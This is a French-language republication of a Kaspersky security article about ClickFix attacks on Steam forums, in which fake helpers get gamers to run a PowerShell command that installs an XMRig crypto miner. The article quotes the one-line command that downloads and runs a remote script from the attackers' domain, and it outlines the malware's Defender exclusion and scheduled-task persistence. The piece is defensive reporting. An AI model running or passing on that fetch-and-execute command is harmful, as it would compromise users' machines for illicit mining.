This website uses cookies
We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services.
Consent Selection
Details
  • Necessary cookies help make a website usable by enabling basic functions like page navigation and access to secure areas of the website. The website cannot function properly without these cookies.
  • Preference cookies enable a website to remember information that changes the way the website behaves or looks, like your preferred language or the region that you are in.
    • We do not use cookies of this type.

  • Statistic cookies help website owners to understand how visitors interact with websites by collecting and reporting information anonymously.
    • We do not use cookies of this type.

  • Marketing cookies are used to track visitors across websites. The intention is to display ads that are relevant and engaging for the individual user and thereby more valuable for publishers and third party advertisers.
    • We do not use cookies of this type.

  • Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
    • __emg_sidPending
      Maximum Storage Duration: 1 dayType: HTTP Cookie
      __emg_vidPending
      Maximum Storage Duration: 1 yearType: HTTP Cookie
      nl-read-countPending
      Maximum Storage Duration: PersistentType: HTML Local Storage
Cookie declaration last updated on 8/12/26 by Cookiebot
[#IABV2_TITLE#]
[#IABV2_BODY_INTRO#]
[#IABV2_BODY_LEGITIMATE_INTEREST_INTRO#]
[#IABV2_BODY_PREFERENCE_INTRO#]
[#IABV2_BODY_PURPOSES_INTRO#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_BODY_FEATURES_INTRO#]
[#IABV2_BODY_FEATURES#]
[#IABV2_BODY_PARTNERS_INTRO#]
[#IABV2_BODY_PARTNERS#]
About
Cookies are small text files that can be used by websites to make a user's experience more efficient.

The law states that we can store cookies on your device if they are strictly necessary for the operation of this site. For all other types of cookies we need your permission.

This site uses different types of cookies. Some cookies are placed by third party services that appear on our pages.

You can at any time change or withdraw your consent from the Cookie Declaration on our website.

Learn more about who we are, how you can contact us and how we process personal data in our Privacy Policy.

Please state your consent ID and date when you contact us regarding your consent.
NewsLayer.com
NewsLayer PulseLIVEBTC$64,786+1.01%ETH$1,917+0.36%SOL$77.03+1.33%XRP$1-0.21%DOGE$0.0703-0.18%ADA$0.1755+0.36%Total Cap$2.31T+0.68%Layer Index48 Neutral
External ReportingPublié il y a un jour

ClickFix sur les forums Steam : comment des commandes PowerShell malveillantes installent un mineur de crypto

ClickFix sur les forums Steam : comment des commandes PowerShell malveillantes installent un mineur de crypto kaspersky.com

ClickFix sur les forums Steam : comment des commandes PowerShell malveillantes installent un mineur de crypto
Publisher kaspersky.com 5 min de lecture
Image via kaspersky.com

Layer Index

48

↑ 4 pts in 24h

Cette année a vu un véritable essor des attaques ClickFix. Elles rencontrent un tel succès auprès des criminels que nous finissons à peine d'écrire sur une variation qu'il est déjà temps de couvrir la suivante.

Cette fois, les attaquants ciblent les joueurs : des journalistes spécialisés en technologie ont repéré des messages diffusant des conseils malveillants sur les forums Steam. Voici à quoi ressemblent ces messages, quels logiciels malveillants ils servent à propager, et comment protéger votre appareil.

ClickFix s'invite sur les forums Steam

De nombreux joueurs se tournent vers leurs pairs sur les forums Steam pour obtenir de l'aide et des conseils sur des sujets tels que la réussite d'une quête difficile, le passage de niveau, l'obtention du meilleur butin ou le contournement d'un bug. Et c'est précisément cette confiance dans les conseils de la communauté que les attaquants ont décidé d'exploiter.

L'attaque commence lorsque des criminels répondent à la question de quelqu'un sur des plantages de jeu, des objets d'inventaire manquants ou d'autres problèmes techniques. Se faisant passer pour des commentateurs serviables, ils suggèrent d'ouvrir PowerShell en tant qu'administrateur et d'exécuter une commande qui est censée corriger le problème rencontré par l'utilisateur.

Déguisant leur message en conseil de dépannage, l'acteur malveillant suggère d'exécuter PowerShell en tant qu'administrateur et d'exécuter une commande qui est censée corriger le problème de l'utilisateur. Source

Comme vous pouvez l'imaginer, l'exécution de la commande ne règle rien — elle ouvre simplement la boîte de Pandore. C'est tout le principe de ClickFix : utiliser l'ingénierie sociale pour inciter les victimes à effectuer elles-mêmes des actions dangereuses tout en donnant aux escrocs ce dont ils ont besoin pour compromettre l'appareil. Nous avons déjà abordé d'autres ruses ClickFix — faux CAPTCHAs, erreurs de navigateur factices, et plus encore — qui reposent toutes sur le fait que la victime exécute elle-même la commande malveillante. Vous pouvez en savoir plus sur les différentes variantes des attaques ClickFix dans notre article précédent.

La ruse d'utiliser ClickFix sur les forums Steam est que l'attaque peut toucher non seulement le joueur qui a demandé de l'aide ; de nombreux autres joueurs qui rencontrent le même problème et trouvent la réponse via une recherche Google peuvent également tomber dans le panneau.

Un petit guide : ce qui se cache réellement derrière la commande irm | iex

Avant de voir ce que les attaquants incitent réellement les joueurs à installer de cette manière, nous devons aborder quelques bases techniques. Tout d'abord, les messages sur les forums Steam conseillent aux victimes potentielles sans méfiance d'exécuter la commande suivante dans PowerShell :

irm msfconfig.icu | iex

Pour quelqu'un qui ne connaît pas intimement PowerShell, cette ligne peut paraître assez inoffensive — elle ressemble au lancement de MSConfig, l'utilitaire de configuration système intégré de Windows, avec quelques paramètres supplémentaires.

En réalité, pourtant, elle est tout sauf inoffensive. Décomposons ce que fait réellement chaque partie de cette commande :

  1. irm est l'abréviation de la commande PowerShell intégrée Invoke-RestMethod. Elle contacte l'adresse Web spécifiée plus loin dans la ligne et récupère des données en réponse.
  2. icu est cette adresse Web — pas le nom d'un fichier local comme cela pourrait paraître au premier abord. Il s'agit du serveur des attaquants, et il répond à la requête irm par un script PowerShell malveillant.
  3. iex est une autre commande PowerShell intégrée, Invoke-Expression. Elle prend tout ce que irm reçoit de cette adresse Web et l'exécute en tant que code PowerShell.

Une fois exécutée, cette ligne de code PowerShell télécharge un script depuis le site spécifié et l'exécute immédiatement. Comme un utilisateur de Reddit l'a souligné à juste titre souligné, vous pouvez découvrir en toute sécurité quel code serait réellement téléchargé sur votre appareil — sans risque qu'il ne s'exécute — simplement en supprimant la deuxième partie, iex. Sans elle, la commande téléchargera simplement le contenu du script et l'affichera dans la fenêtre PowerShell sans l'exécuter. Cela vous donne le code complet, non masqué, qu'on vous demande d'exécuter sur votre appareil. Ensuite, voyons ce que ces commentateurs serviables des forums Steam essaient réellement de faire installer aux joueurs sur leurs machines.

Un mineur de cryptomonnaie, pas un outil d'optimisation

Les attaquants ont fait leurs devoirs : le script PowerShell téléchargé depuis leur serveur imite de façon convaincante un utilitaire d'optimisation de Windows. Une fois lancé, il affiche à l'utilisateur une série de notifications prétendant effacer les fichiers temporaires, vider le cache DNS, mettre à jour les pilotes, vérifier le disque pour des erreurs, désactiver les applications de démarrage inutiles, analyser le système à la recherche de logiciels malveillants, réparer l'image Windows et vérifier l'intégrité des fichiers système.

Le script affiche un flux de messages sur diverses tâches d'optimisation factices pour donner l'impression qu'il effectue une maintenance utile. Source

Pendant ce temps, l'activité réelle se déroule en coulisses. Le script commence par vérifier s'il s'exécute avec des privilèges d'administrateur. Si c'est le cas, il crée un dossier de travail caché dans C:\Windows\Background et l'ajoute à la liste d'exclusion de Microsoft Defender. À partir de là, tout fichier placé dans ce dossier cesse d'être analysé par l'antivirus intégré de Windows.

Ensuite, le script prépare le système pour l'étape suivante de l'attaque et télécharge un exécutable depuis le serveur des attaquants — en l'enregistrant dans ce même dossier C:\Windows\Background sous le nom au son légitime system.exe.

Le fichier téléchargé est XMRig, l'un des outils les plus populaires pour miner la cryptomonnaie Monero. XMRig lui-même n'est pas un logiciel malveillant ; c'est un outil de minage légitime et open-source. Le problème est que les attaquants l'installent sur les ordinateurs des victimes à leur insu. Une fois en cours d'exécution, la puissance de calcul de l'appareil est détournée pour le minage de Monero, et la cryptomonnaie qui en résulte va directement aux criminels.

Cela fait des configurations des joueurs des cibles particulièrement attrayantes : les PC de jeu modernes disposent de CPU et de GPU puissants — exactement le type de matériel idéal pour miner de la crypto.

Pour s'assurer que le logiciel malveillant survive à un redémarrage, le script crée également une nouvelle tâche dans le Planificateur de tâches de Windows : XMRig-{computer name}. Dès lors, il lance automatiquement le mineur de cryptomonnaie à chaque démarrage du système.

Comment protéger votre appareil des mineurs de cryptomonnaie et autres logiciels malveillants

Malheureusement, de nombreux joueurs hésitent à installer des logiciels de sécurité — ou à les laisser fonctionner — sur leurs appareils. Le principal coupable est le mythe persistant selon lequel « un antivirus ralentit votre jeu ». Nous avons déjà publié des recherches à ce sujet sur notre blog, et les résultats n'ont montré aucun impact significatif sur les performances lors de l'utilisation d'un antivirus pendant le jeu.

On ne peut pas en dire autant des mineurs de cryptomonnaie, en revanche — ils nuisent nettement aux performances et usent votre matériel plus rapidement par-dessus le marché. Alors, que pouvez-vous faire pour garder votre PC de jeu et vos comptes à l'abri ?

  • Évitez d'exécuter des scripts PowerShell, Terminal ou d'autres invites de commande que des inconnus vous suggèrent de copier et d'exécuter — que ce soit sur des forums, dans des chats ou dans des commentaires.
  • Avant d'appuyer sur Entrée pour toute commande que vous ne comprenez pas entièrement, recherchez ce qu'elle fait et les retombées potentielles de son exécution.
  • Utilisez une solution de sécurité fiable dotée d'un mode jeu qui signalera à temps les tentatives de téléchargement de logiciels malveillants et bloquera leur exécution.
  • Ne désactivez pas la protection pendant que vous jouez. Utiliser une solution avec un mode jeu dédié est la solution idéale. Les produits de sécurité Kaspersky activent automatiquement ce mode dès qu'un jeu est lancé, reportant les mises à jour de la base de données antivirus, les notifications et les analyses de disque planifiées jusqu'à ce que vous ayez fini de jouer.

Curieux de savoir comment les attaquants ciblent autrement les joueurs ? Consultez nos autres articles :

Dernière Minute

Ne manquez aucune actualité de dernière minute

Advertisement

House — Advertise on NewsLayer
NewsLayerAd

Sourced by

Originally reported by kaspersky.com

NewsLayer coverage based on externally reported material.

The Daily Brief

The onchain economy, before your day starts.

Curated markets, onchain insights, and key headlines — delivered every weekday morning.

Weekdays · Free · ~5 minute read

Articles Liés